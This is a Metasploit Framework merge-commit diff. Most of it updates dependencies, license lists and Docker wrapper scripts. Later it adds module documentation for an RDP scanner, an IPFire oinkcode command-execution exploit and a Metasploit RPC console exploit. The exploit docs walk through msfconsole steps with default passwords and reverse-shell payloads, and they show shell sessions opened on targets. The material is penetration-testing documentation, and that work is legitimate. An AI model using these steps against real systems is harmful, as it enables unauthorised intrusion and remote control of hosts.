Merge branch 'master' into land-8716
commit
838b066abe
|
@ -16,8 +16,6 @@ rvm:
|
|||
- '2.4.1'
|
||||
|
||||
env:
|
||||
# TODO: restore these tests when the code passes them!
|
||||
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
|
||||
|
||||
|
|
16
Gemfile
16
Gemfile
|
@ -3,6 +3,14 @@ source 'https://rubygems.org'
|
|||
# spec.add_runtime_dependency '<name>', [<version requirements>]
|
||||
gemspec name: 'metasploit-framework'
|
||||
|
||||
# These pull in pre-release gems in order to fix specific issues.
|
||||
# XXX https://github.com/alexdalitz/dnsruby/pull/134
|
||||
gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby'
|
||||
|
||||
# XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970
|
||||
gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' if [
|
||||
'x86_64-linux', 'x86-linux', 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
|
||||
|
||||
# separate from test as simplecov is not run on travis-ci
|
||||
group :coverage do
|
||||
# code coverage for tests
|
||||
|
@ -37,14 +45,6 @@ group :development, :test do
|
|||
end
|
||||
|
||||
group :test do
|
||||
# cucumber extension for testing command line applications, like msfconsole
|
||||
gem 'aruba'
|
||||
# cucumber + automatic database cleaning with database_cleaner
|
||||
gem 'cucumber-rails', :require => false
|
||||
gem 'shoulda-matchers'
|
||||
# Manipulate Time.now in specs
|
||||
gem 'timecop'
|
||||
# Needed to work around a regression between capybara 2.7.1 and xpath 2.1
|
||||
# XXX remove when capybara is updated to work with xpath 2.1
|
||||
gem 'xpath', '2.0'
|
||||
end
|
||||
|
|
88
Gemfile.lock
88
Gemfile.lock
|
@ -1,7 +1,19 @@
|
|||
GIT
|
||||
remote: https://github.com/ConnorAtherton/rb-readline
|
||||
revision: fd882edcd145c26681f9971be5f6675c7f6d1970
|
||||
specs:
|
||||
rb-readline (0.5.4)
|
||||
|
||||
GIT
|
||||
remote: https://github.com/alexdalitz/dnsruby
|
||||
revision: 09c3890ccfaedb7fd4951f56575d5c53651e0140
|
||||
specs:
|
||||
dnsruby (1.60.1)
|
||||
|
||||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.15.1)
|
||||
metasploit-framework (4.15.4)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -16,9 +28,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.2.37)
|
||||
metasploit-payloads (= 1.2.42)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.1.10)
|
||||
metasploit_payloads-mettle (= 0.1.14)
|
||||
msgpack
|
||||
nessus_rest
|
||||
net-ssh
|
||||
|
@ -46,7 +58,7 @@ PATH
|
|||
rex-mime
|
||||
rex-nop
|
||||
rex-ole
|
||||
rex-powershell
|
||||
rex-powershell (< 0.1.73)
|
||||
rex-random_identifier
|
||||
rex-registry
|
||||
rex-rop_builder
|
||||
|
@ -102,48 +114,13 @@ GEM
|
|||
arel (6.0.4)
|
||||
arel-helpers (2.4.0)
|
||||
activerecord (>= 3.1.0, < 6)
|
||||
aruba (0.14.2)
|
||||
childprocess (~> 0.5.6)
|
||||
contracts (~> 0.9)
|
||||
cucumber (>= 1.3.19)
|
||||
ffi (~> 1.9.10)
|
||||
rspec-expectations (>= 2.99)
|
||||
thor (~> 0.19)
|
||||
backports (3.8.0)
|
||||
bcrypt (3.1.11)
|
||||
bindata (2.4.0)
|
||||
bit-struct (0.16)
|
||||
builder (3.2.3)
|
||||
capybara (2.14.4)
|
||||
addressable
|
||||
mime-types (>= 1.16)
|
||||
nokogiri (>= 1.3.3)
|
||||
rack (>= 1.0.0)
|
||||
rack-test (>= 0.5.4)
|
||||
xpath (~> 2.0)
|
||||
childprocess (0.5.9)
|
||||
ffi (~> 1.0, >= 1.0.11)
|
||||
coderay (1.1.1)
|
||||
contracts (0.16.0)
|
||||
cucumber (2.4.0)
|
||||
builder (>= 2.1.2)
|
||||
cucumber-core (~> 1.5.0)
|
||||
cucumber-wire (~> 0.0.1)
|
||||
diff-lcs (>= 1.1.3)
|
||||
gherkin (~> 4.0)
|
||||
multi_json (>= 1.7.5, < 2.0)
|
||||
multi_test (>= 0.1.2)
|
||||
cucumber-core (1.5.0)
|
||||
gherkin (~> 4.0)
|
||||
cucumber-rails (1.5.0)
|
||||
capybara (>= 1.1.2, < 3)
|
||||
cucumber (>= 1.3.8, < 4)
|
||||
mime-types (>= 1.17, < 4)
|
||||
nokogiri (~> 1.5)
|
||||
railties (>= 4, < 5.2)
|
||||
cucumber-wire (0.0.1)
|
||||
diff-lcs (1.3)
|
||||
dnsruby (1.60.1)
|
||||
docile (1.1.5)
|
||||
erubis (2.7.0)
|
||||
factory_girl (4.8.0)
|
||||
|
@ -151,15 +128,13 @@ GEM
|
|||
factory_girl_rails (4.8.0)
|
||||
factory_girl (~> 4.8.0)
|
||||
railties (>= 3.0.0)
|
||||
faraday (0.12.1)
|
||||
faraday (0.12.2)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
ffi (1.9.18)
|
||||
filesize (0.1.1)
|
||||
fivemat (1.3.5)
|
||||
gherkin (4.1.3)
|
||||
google-protobuf (3.3.0)
|
||||
googleauth (0.5.1)
|
||||
faraday (~> 0.9)
|
||||
googleauth (0.5.2)
|
||||
faraday (~> 0.12)
|
||||
jwt (~> 1.4)
|
||||
logging (~> 2.0)
|
||||
memoist (~> 0.12)
|
||||
|
@ -203,7 +178,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.2.37)
|
||||
metasploit-payloads (1.2.42)
|
||||
metasploit_data_models (2.0.15)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -214,16 +189,12 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.1.10)
|
||||
metasploit_payloads-mettle (0.1.14)
|
||||
method_source (0.8.2)
|
||||
mime-types (3.1)
|
||||
mime-types-data (~> 3.2015)
|
||||
mime-types-data (3.2016.0521)
|
||||
mini_portile2 (2.2.0)
|
||||
minitest (5.10.2)
|
||||
minitest (5.10.3)
|
||||
msgpack (1.1.0)
|
||||
multi_json (1.12.1)
|
||||
multi_test (0.1.2)
|
||||
multipart-post (2.0.0)
|
||||
nessus_rest (0.1.6)
|
||||
net-ssh (4.1.0)
|
||||
|
@ -274,7 +245,6 @@ GEM
|
|||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.0.0)
|
||||
rb-readline (0.5.4)
|
||||
recog (2.1.11)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
|
@ -286,7 +256,7 @@ GEM
|
|||
rex-core
|
||||
rex-struct2
|
||||
rex-text
|
||||
rex-core (0.1.11)
|
||||
rex-core (0.1.12)
|
||||
rex-encoder (0.1.4)
|
||||
metasm
|
||||
rex-arch
|
||||
|
@ -358,8 +328,6 @@ GEM
|
|||
sawyer (0.8.1)
|
||||
addressable (>= 2.3.5, < 2.6)
|
||||
faraday (~> 0.8, < 1.0)
|
||||
shoulda-matchers (3.1.2)
|
||||
activesupport (>= 4.0.0)
|
||||
signet (0.7.3)
|
||||
addressable (~> 2.3)
|
||||
faraday (~> 0.9)
|
||||
|
@ -386,16 +354,13 @@ GEM
|
|||
activemodel (>= 4.2.7)
|
||||
activesupport (>= 4.2.7)
|
||||
xmlrpc (0.3.0)
|
||||
xpath (2.0.0)
|
||||
nokogiri (~> 1.3)
|
||||
yard (0.9.9)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
||||
DEPENDENCIES
|
||||
aruba
|
||||
cucumber-rails
|
||||
dnsruby!
|
||||
factory_girl_rails
|
||||
fivemat
|
||||
metasploit-aggregator
|
||||
|
@ -403,14 +368,13 @@ DEPENDENCIES
|
|||
octokit
|
||||
pry
|
||||
rake
|
||||
rb-readline!
|
||||
redcarpet
|
||||
rspec-rails
|
||||
rspec-rerun
|
||||
shoulda-matchers
|
||||
simplecov
|
||||
timecop
|
||||
xpath (= 2.0)
|
||||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.15.1
|
||||
1.15.3
|
||||
|
|
79
LICENSE_GEMS
79
LICENSE_GEMS
|
@ -1,71 +1,62 @@
|
|||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||
actionpack, 4.2.8, MIT
|
||||
actionview, 4.2.8, MIT
|
||||
activemodel, 4.2.8, MIT
|
||||
activerecord, 4.2.8, MIT
|
||||
activesupport, 4.2.8, MIT
|
||||
Ascii85, 1.0.2, MIT
|
||||
actionpack, 4.2.9, MIT
|
||||
actionview, 4.2.9, MIT
|
||||
activemodel, 4.2.9, MIT
|
||||
activerecord, 4.2.9, MIT
|
||||
activesupport, 4.2.9, MIT
|
||||
addressable, 2.5.1, "Apache 2.0"
|
||||
afm, 0.2.2, MIT
|
||||
arel, 6.0.4, MIT
|
||||
arel-helpers, 2.4.0, unknown
|
||||
aruba, 0.14.2, MIT
|
||||
backports, 3.8.0, MIT
|
||||
bcrypt, 3.1.11, MIT
|
||||
bindata, 2.4.0, ruby
|
||||
bit-struct, 0.16, ruby
|
||||
builder, 3.2.3, MIT
|
||||
bundler, 1.15.0, MIT
|
||||
capybara, 2.14.0, MIT
|
||||
childprocess, 0.5.9, MIT
|
||||
bundler, 1.15.1, MIT
|
||||
coderay, 1.1.1, MIT
|
||||
contracts, 0.16.0, "Simplified BSD"
|
||||
cucumber, 2.4.0, MIT
|
||||
cucumber-core, 1.5.0, MIT
|
||||
cucumber-rails, 1.5.0, MIT
|
||||
cucumber-wire, 0.0.1, MIT
|
||||
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
|
||||
dnsruby, 1.60.1, "Apache 2.0"
|
||||
docile, 1.1.5, MIT
|
||||
erubis, 2.7.0, MIT
|
||||
factory_girl, 4.8.0, MIT
|
||||
factory_girl_rails, 4.8.0, MIT
|
||||
faraday, 0.12.1, MIT
|
||||
ffi, 1.9.18, "New BSD"
|
||||
filesize, 0.1.1, MIT
|
||||
fivemat, 1.3.3, MIT
|
||||
gherkin, 4.1.3, MIT
|
||||
fivemat, 1.3.5, MIT
|
||||
google-protobuf, 3.3.0, "New BSD"
|
||||
googleauth, 0.5.1, "Apache 2.0"
|
||||
grpc, 1.3.4, "New BSD"
|
||||
i18n, 0.8.1, MIT
|
||||
grpc, 1.4.1, "New BSD"
|
||||
hashery, 2.1.2, "Simplified BSD"
|
||||
i18n, 0.8.6, MIT
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.1.0, ruby
|
||||
jwt, 1.5.6, MIT
|
||||
little-plugger, 1.1.4, MIT
|
||||
logging, 2.2.2, MIT
|
||||
loofah, 2.0.3, MIT
|
||||
memoist, 0.15.0, MIT
|
||||
memoist, 0.16.0, MIT
|
||||
metasm, 1.0.3, LGPL
|
||||
metasploit-aggregator, 0.2.1, "New BSD"
|
||||
metasploit-concern, 2.0.4, "New BSD"
|
||||
metasploit-credential, 2.0.9, "New BSD"
|
||||
metasploit-framework, 4.14.23, "New BSD"
|
||||
metasploit-concern, 2.0.5, "New BSD"
|
||||
metasploit-credential, 2.0.10, "New BSD"
|
||||
metasploit-framework, 4.15.0, "New BSD"
|
||||
metasploit-model, 2.0.4, "New BSD"
|
||||
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 2.0.14, "New BSD"
|
||||
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
|
||||
metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 2.0.15, "New BSD"
|
||||
metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.8.2, MIT
|
||||
mime-types, 3.1, MIT
|
||||
mime-types-data, 3.2016.0521, MIT
|
||||
mini_portile2, 2.1.0, MIT
|
||||
mini_portile2, 2.2.0, MIT
|
||||
minitest, 5.10.2, MIT
|
||||
msgpack, 1.1.0, "Apache 2.0"
|
||||
multi_json, 1.12.1, MIT
|
||||
multi_test, 0.1.2, MIT
|
||||
multipart-post, 2.0.0, MIT
|
||||
nessus_rest, 0.1.6, MIT
|
||||
net-ssh, 4.1.0, MIT
|
||||
network_interface, 0.0.1, MIT
|
||||
nexpose, 6.0.0, BSD
|
||||
nokogiri, 1.7.2, MIT
|
||||
nexpose, 6.1.0, BSD
|
||||
nokogiri, 1.8.0, MIT
|
||||
octokit, 4.7.0, MIT
|
||||
openssl-ccm, 1.2.1, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
|
@ -73,6 +64,7 @@ os, 0.9.6, MIT
|
|||
packetfu, 1.1.13, BSD
|
||||
patch_finder, 1.0.2, "New BSD"
|
||||
pcaprub, 0.12.4, LGPL-2.1
|
||||
pdf-reader, 2.0.0, MIT
|
||||
pg, 0.20.0, "New BSD"
|
||||
pg_array_parser, 0.0.9, unknown
|
||||
postgres_ext, 3.0.0, MIT
|
||||
|
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
|
|||
rails-deprecated_sanitizer, 1.0.3, MIT
|
||||
rails-dom-testing, 1.0.8, MIT
|
||||
rails-html-sanitizer, 1.0.3, MIT
|
||||
railties, 4.2.8, MIT
|
||||
railties, 4.2.9, MIT
|
||||
rake, 12.0.0, MIT
|
||||
rb-readline, 0.5.4, BSD
|
||||
recog, 2.1.8, unknown
|
||||
recog, 2.1.11, unknown
|
||||
redcarpet, 3.4.0, MIT
|
||||
rex-arch, 0.1.4, "New BSD"
|
||||
rex-bin_tools, 0.1.3, "New BSD"
|
||||
rex-core, 0.1.10, "New BSD"
|
||||
rex-arch, 0.1.9, "New BSD"
|
||||
rex-bin_tools, 0.1.4, "New BSD"
|
||||
rex-core, 0.1.11, "New BSD"
|
||||
rex-encoder, 0.1.4, "New BSD"
|
||||
rex-exploitation, 0.1.14, "New BSD"
|
||||
rex-java, 0.1.5, "New BSD"
|
||||
|
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
|
|||
rex-random_identifier, 0.1.2, "New BSD"
|
||||
rex-registry, 0.1.3, "New BSD"
|
||||
rex-rop_builder, 0.1.3, "New BSD"
|
||||
rex-socket, 0.1.6, "New BSD"
|
||||
rex-socket, 0.1.8, "New BSD"
|
||||
rex-sslscan, 0.1.4, "New BSD"
|
||||
rex-struct2, 0.1.2, "New BSD"
|
||||
rex-text, 0.2.15, "New BSD"
|
||||
rex-zip, 0.1.3, "New BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
robots, 0.10.1, MIT
|
||||
rspec, 3.6.0, MIT
|
||||
rspec-core, 3.6.0, MIT
|
||||
rspec-expectations, 3.6.0, MIT
|
||||
rspec-mocks, 3.6.0, MIT
|
||||
rspec-rails, 3.6.0, MIT
|
||||
rspec-rerun, 1.1.0, MIT
|
||||
rspec-support, 3.6.0, MIT
|
||||
ruby_smb, 0.0.17, "New BSD"
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby_smb, 0.0.18, "New BSD"
|
||||
rubyntlm, 0.6.2, MIT
|
||||
rubyzip, 1.2.1, "Simplified BSD"
|
||||
sawyer, 0.8.1, MIT
|
||||
shoulda-matchers, 3.1.1, MIT
|
||||
signet, 0.7.3, "Apache 2.0"
|
||||
simplecov, 0.14.1, MIT
|
||||
simplecov-html, 0.10.1, MIT
|
||||
|
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
|
|||
sshkey, 1.9.0, MIT
|
||||
thor, 0.19.4, MIT
|
||||
thread_safe, 0.3.6, "Apache 2.0"
|
||||
timecop, 0.8.1, MIT
|
||||
timecop, 0.9.1, MIT
|
||||
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
|
||||
tzinfo, 1.2.3, MIT
|
||||
tzinfo-data, 1.2017.2, MIT
|
||||
windows_error, 0.1.2, BSD
|
||||
xdr, 2.0.0, "Apache 2.0"
|
||||
xmlrpc, 0.3.0, ruby
|
||||
xpath, 2.1.0, MIT
|
||||
yard, 0.9.9, MIT
|
||||
|
|
|
@ -14,8 +14,7 @@ New bugs and feature requests should be directed to:
|
|||
API documentation for writing modules can be found at:
|
||||
https://rapid7.github.io/metasploit-framework/api
|
||||
|
||||
Questions and suggestions can be sent to:
|
||||
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
|
||||
Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
|
||||
|
||||
Installing
|
||||
--
|
||||
|
|
|
@ -24,7 +24,6 @@ RUN apk update && \
|
|||
bison \
|
||||
build-base \
|
||||
ruby-dev \
|
||||
libffi-dev\
|
||||
openssl-dev \
|
||||
readline-dev \
|
||||
sqlite-dev \
|
||||
|
@ -35,6 +34,7 @@ RUN apk update && \
|
|||
yaml-dev \
|
||||
zlib-dev \
|
||||
ncurses-dev \
|
||||
git \
|
||||
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
||||
&& bundle install --system $BUNDLER_ARGS \
|
||||
&& apk del .ruby-builddeps \
|
||||
|
|
|
@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then
|
|||
MSF_PATH=$(dirname $(dirname $path))
|
||||
fi
|
||||
|
||||
if [[ -n "$MSF_BUILD" ]]; then
|
||||
docker-compose -f $MSF_PATH/docker-compose.yml build
|
||||
fi
|
||||
|
||||
cd $MSF_PATH
|
||||
docker-compose run --rm --service-ports ms ./msfvenom "$@"
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
#! /bin/bash
|
||||
|
||||
if [[ -z "$MSF_PATH" ]]; then
|
||||
path=`dirname $0`
|
||||
|
||||
# check for ./docker/msfconsole.rc
|
||||
if [[ ! -f $path/../msfconsole.rc ]] ; then
|
||||
|
||||
# we are not inside the project
|
||||
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
|
||||
|
||||
# determine script path
|
||||
pushd $(dirname $(realpath $0)) > /dev/null
|
||||
path=$(pwd)
|
||||
popd > /dev/null
|
||||
fi
|
||||
MSF_PATH=$(dirname $(dirname $path))
|
||||
fi
|
||||
|
||||
cd $MSF_PATH
|
||||
|
||||
if [[ -n "$MSF_BUILD" ]]; then
|
||||
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
|
||||
fi
|
||||
|
||||
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"
|
|
@ -0,0 +1,66 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
|
||||
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
|
||||
3. Do: ```run```
|
||||
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
|
||||
|
||||
## Options
|
||||
|
||||
There are three options currently supported that control what security protocols to
|
||||
send in the RDP negotiation request, which can be helpful in identifying RDP
|
||||
endpoints that might be locked down or configured differently:
|
||||
|
||||
**TLS** Set to true to request TLS security support
|
||||
**CredSSP** Set to true to request CredSSP support
|
||||
**EarlyUser** Set to true to request Early User Authorization Result PDU support
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf auxiliary(rdp_scanner) > run
|
||||
|
||||
[+] 10.4.18.26:3389 - Identified RDP
|
||||
[+] 10.4.18.22:3389 - Identified RDP
|
||||
[+] 10.4.18.89:3389 - Identified RDP
|
||||
[+] 10.4.18.9:3389 - Identified RDP
|
||||
[+] 10.4.18.67:3389 - Identified RDP
|
||||
[+] 10.4.18.80:3389 - Identified RDP
|
||||
[+] 10.4.18.34:3389 - Identified RDP
|
||||
[+] 10.4.18.70:3389 - Identified RDP
|
||||
[+] 10.4.18.30:3389 - Identified RDP
|
||||
[+] 10.4.18.76:3389 - Identified RDP
|
||||
[+] 10.4.18.13:3389 - Identified RDP
|
||||
[+] 10.4.18.91:3389 - Identified RDP
|
||||
[+] 10.4.18.5:3389 - Identified RDP
|
||||
[+] 10.4.18.47:3389 - Identified RDP
|
||||
[+] 10.4.18.41:3389 - Identified RDP
|
||||
[+] 10.4.18.105:3389 - Identified RDP
|
||||
[*] Scanned 44 of 256 hosts (17% complete)
|
||||
[*] Scanned 55 of 256 hosts (21% complete)
|
||||
[+] 10.4.18.118:3389 - Identified RDP
|
||||
[+] 10.4.18.108:3389 - Identified RDP
|
||||
[+] 10.4.18.139:3389 - Identified RDP
|
||||
[*] Scanned 94 of 256 hosts (36% complete)
|
||||
[*] Scanned 110 of 256 hosts (42% complete)
|
||||
[+] 10.4.18.157:3389 - Identified RDP
|
||||
[+] 10.4.18.166:3389 - Identified RDP
|
||||
[+] 10.4.18.164:3389 - Identified RDP
|
||||
[+] 10.4.18.170:3389 - Identified RDP
|
||||
[+] 10.4.18.185:3389 - Identified RDP
|
||||
[+] 10.4.18.209:3389 - Identified RDP
|
||||
[+] 10.4.18.188:3389 - Identified RDP
|
||||
[*] Scanned 156 of 256 hosts (60% complete)
|
||||
[+] 10.4.18.237:3389 - Identified RDP
|
||||
[+] 10.4.18.225:3389 - Identified RDP
|
||||
[*] Scanned 186 of 256 hosts (72% complete)
|
||||
[*] Scanned 194 of 256 hosts (75% complete)
|
||||
[*] Scanned 208 of 256 hosts (81% complete)
|
||||
[*] Scanned 253 of 256 hosts (98% complete)
|
||||
[*] Scanned 256 of 256 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,48 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
|
||||
|
||||
This module has been verified against:
|
||||
|
||||
1. 2.19 core 100
|
||||
2. 2.19 core 110 (exploit-db, not metasploit module)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the firewall
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
|
||||
4. Do: ```set password admin``` or whatever it was set to at install
|
||||
5. Do: ```set rhost 10.10.10.10```
|
||||
6. Do: ```set payload cmd/unix/reverse_perl```
|
||||
7. Do: ```set lhost 192.168.2.229```
|
||||
8. Do: ```exploit```
|
||||
9. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/ipfire_oinkcode_exec
|
||||
msf exploit(ipfire_oinkcode_exec) > set password admin
|
||||
password => admin
|
||||
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
|
||||
rhost => 192.168.2.201
|
||||
msf exploit(ipfire_oinkcode_exec) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(ipfire_oinkcode_exec) > check
|
||||
[*] 192.168.2.201:444 The target appears to be vulnerable.
|
||||
msf exploit(ipfire_oinkcode_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
|
||||
id
|
||||
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
|
||||
whoami
|
||||
nobody
|
||||
```
|
|
@ -0,0 +1,142 @@
|
|||
## Description
|
||||
|
||||
This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
|
||||
|
||||
To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* Metasploit 4.15 on Kali 1.0.6
|
||||
* Metasploit 4.14 on Kali 2017.1
|
||||
* Metasploit 4.14 on Windows 7 SP1
|
||||
|
||||
Source and Installers:
|
||||
|
||||
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
|
||||
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploit/multi/misc/msf_rpc_console`
|
||||
3. Do: `set RHOST [IP]`
|
||||
4. Do: `set RPORT [PORT]` (default: `55552`)
|
||||
5. Do: `set USERNAME [USERNAME]` (default: `msf`)
|
||||
6. Do: `set PASSWORD [PASSWORD]`
|
||||
7. Do: `set LHOST [IP]`
|
||||
8. Do: `run`
|
||||
9. You should get a session
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**Username**
|
||||
|
||||
The username for Metasploit RPC (default: `msf`).
|
||||
|
||||
**Password**
|
||||
|
||||
The password for the RPC user.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ruby Target
|
||||
|
||||
```
|
||||
msf > use exploit/multi/misc/msf_rpc_console
|
||||
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
|
||||
rhost => 172.16.191.166
|
||||
msf exploit(msf_rpc_console) > set username msf
|
||||
username => msf
|
||||
msf exploit(msf_rpc_console) > set password abc123
|
||||
password => abc123
|
||||
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
|
||||
lhost => 172.16.191.181
|
||||
msf exploit(msf_rpc_console) > set target 0
|
||||
target => 0
|
||||
msf exploit(msf_rpc_console) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[+] 172.16.191.166:55552 - Authenticated successfully
|
||||
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
|
||||
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
|
||||
[*] 172.16.191.166:55552 - API version 1.0
|
||||
[+] 172.16.191.166:55552 - Created console #0
|
||||
[*] 172.16.191.166:55552 - Sending payload...
|
||||
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
|
||||
|
||||
whoami
|
||||
win-sgbsd5tqutq\user
|
||||
```
|
||||
|
||||
### Windows CMD Target
|
||||
|
||||
```
|
||||
msf > use exploit/multi/misc/msf_rpc_console
|
||||
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
|
||||
rhost => 172.16.191.166
|
||||
msf exploit(msf_rpc_console) > set username msf
|
||||
username => msf
|
||||
msf exploit(msf_rpc_console) > set password abc123
|
||||
password => abc123
|
||||
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
|
||||
lhost => 172.16.191.181
|
||||
msf exploit(msf_rpc_console) > set target 0
|
||||
target => 1
|
||||
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
|
||||
payload => cmd/windows/powershell_reverse_tcp
|
||||
msf exploit(msf_rpc_console) > run
|
||||
|
||||
[*] Started reverse SSL handler on 172.16.191.181:4444
|
||||
[+] 172.16.191.166:55552 - Authenticated successfully
|
||||
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
|
||||
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
|
||||
[*] 172.16.191.166:55552 - API version 1.0
|
||||
[+] 172.16.191.166:55552 - Created console #1
|
||||
[*] 172.16.191.166:55552 - Sending payload...
|
||||
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
|
||||
|
||||
Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
|
||||
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
|
||||
|
||||
PS C:\metasploit>whoami
|
||||
win-sgbsd5tqutq\user
|
||||
```
|
||||
|
||||
### Unix CMD Target
|
||||
|
||||
```
|
||||
msf > use exploit/multi/misc/msf_rpc_console
|
||||
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
|
||||
rhost => 172.16.191.215
|
||||
msf exploit(msf_rpc_console) > set username msf
|
||||
username => msf
|
||||
msf exploit(msf_rpc_console) > set password abc123
|
||||
password => abc123
|
||||
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
|
||||
lhost => 172.16.191.181
|
||||
msf exploit(msf_rpc_console) > set target 2
|
||||
target => 2
|
||||
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
|
||||
payload => cmd/unix/reverse_python
|
||||
msf exploit(msf_rpc_console) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[+] 172.16.191.215:55552 - Authenticated successfully
|
||||
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
|
||||
